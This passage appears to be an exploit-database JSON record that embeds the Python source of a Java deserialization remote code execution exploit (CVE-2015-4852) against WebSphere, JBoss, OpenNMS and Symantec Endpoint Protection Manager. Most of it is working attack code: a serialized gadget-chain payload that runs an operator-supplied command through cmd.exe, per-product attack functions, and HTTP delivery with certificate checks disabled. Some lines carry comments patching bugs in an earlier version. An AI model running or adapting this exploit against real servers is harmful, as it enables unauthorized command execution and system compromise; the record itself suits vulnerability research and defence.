print(\"[i] Unix target selected. Sending 'ping -c 5 <attack_ip>' to target.\")\r

cmdargs.cmd = \"ping -c 5 %s\" % host_ip # -c on Unix; the original wrote == (no assignment) and used the Windows -n flag\r

else:\r

print(\"[i] Lazy bugger.. right, I am gonna continue anyway.\")\r

\r

if cmdargs.serv == \"websphere\":\r

print(\"[i] WebSphere selected as target app.\")\r

if cmdargs.test:\r

websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r

else:\r

if not cmdargs.cmd: # argparse gives cmd the default \"\", so the original == None check never fired\r

sys.exit(\"[x] You didn't provide any command to run. Exiting..\")\r

websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r

elif cmdargs.serv == \"opennms\":\r

print(\"[i] OpenNMS selected as target app.\")\r

if cmdargs.test:\r

opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)\r

else:\r

if not cmdargs.cmd: # argparse gives cmd the default \"\", so the original == None check never fired\r

sys.exit(\"[x] You didn't provide any command to run. Exiting..\")\r

opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)\r

elif cmdargs.serv == \"jboss\":\r

print(\"[i] JBoss selected as target app.\")\r

if cmdargs.test:\r

jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r

else:\r

if not cmdargs.cmd: # argparse gives cmd the default \"\", so the original == None check never fired\r

sys.exit(\"[x] You didn't provide any command to run. Exiting..\")\r

jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r

else:\r

print(\"[i] Symantec Endpoint selected as target app.\")\r

if cmdargs.test:\r

symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r

else:\r

if not cmdargs.cmd: # argparse gives cmd the default \"\", so the original == None check never fired\r

sys.exit(\"[x] You didn't provide any command to run. Exiting..\")\r

symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r

\r

print(\"[i] Thank you for using this tool. Contact author for any comments.\")", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44552/"}], "zdt": [{"lastseen": "2018-04-30T02:13:36", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2018-04-29T00:00:00", "title": "Websphere / JBoss / OpenNMS / Symantec - Java Deserialization Remote Code Execution", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4852"], "modified": "2018-04-29T00:00:00", "id": "1337DAY-ID-30269", "href": "https://0day.today/exploit/description/30269", "sourceData": "#!/usr/bin/env python3\r

#\r

# ____ _ _ _ \r

# / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r

# \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r

# ___) | __/ | | | (_| | | (_| | || (_) | | \r

# |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r

#\r

# By Nikhil Sreekumar (@roo7break)\r

# Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution\r

\r

import sys\r

import base64\r

import httplib2\r

import socket\r

import argparse\r

import os\r

import struct\r

import ctypes\r

\r

version = \"0.1\"\r

banner = \"\"\"\r

____ _ _ _ \r

/ ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r

\\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r

___) | __/ | | | (_| | | (_| | || (_) | | \r

|____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r

by Nikhil Sreekumar (@roo7break) v %s\r

\r

\"\"\" % version\r

\r

def hex2raw3(teststr):\r

\"\"\"\r

This function takes a hex string and returns a str with one character per byte value (0x00-0xFF); encode it with latin-1 to get the bytes back, never with ascii\r

\"\"\"\r

# From: HexToByte() at http://code.activestate.com/recipes/510399-byte-to-hex-and-hex-to-byte-string-conversion/\r

out = [] # named out rather than bytes so the builtin is not shadowed\r

teststr = ''.join( teststr.split(\" \") )\r

for i in range(0, len(teststr), 2):\r

out.append( chr( int (teststr[i:i+2], 16 ) ) ) # one character per byte value\r

return \"\".join(out)\r

\r

def symantec_endpoint_attack(HOST, PORT, SSL_On, _cmd):\r

# The below code is based on the symantec_endpoint_prot_mgr_2015_6554.nasl script within Nessus\r

\"\"\"\r

This function sets up the attack payload for Symantec Endpoint\r

\"\"\"\r

\r

java_payload = '\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x6
3\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x04\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x25\\x63\\x6f\\x6d\\x2e\\x73\\x79\\x67\\x61\\x74\\x65\\x2e\\x73\\x63\\x6d\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x52\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x0
2\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0e\\x72\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x4c\\x69\\x6e\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x76\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x01\\x75\\x71\\x00\\x7e\\x00\\x20\\x00\\x00\\x00\\x03\\x74\\x00\\x07\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x74\\x00\\x02\\x2f\\x63\\x74\\x00'\r

\r

cleng = len(_cmd)\r

java_payload += chr(cleng) + _cmd\r

java_payload += '\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a'\r

\r

fullpayload = \"\"\"------=_Part_0_992568364.1449677528532\r

Content-Type: application/binary\r

Content-Disposition: form-data; name=\"Content\"\r

\r

%s \r

\r

------=_Part_0_992568364.1449677528532--\r

\"\"\" % java_payload\r

\r

if SSL_On:\r

webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r

URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r

else:\r

webservice = httplib2.Http()\r

URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r

\r

headers = {\"User-Agent\":\"Symantec_RCE_POC\",\r

\"Content-type\":\"multipart/form-data; boundary=----=_Part_0_992568364.1449677528532\", # boundary is a parameter of Content-Type, not a header of its own; without it the server cannot split the body\r

\"Accept\":\"text/html, image/gif, ima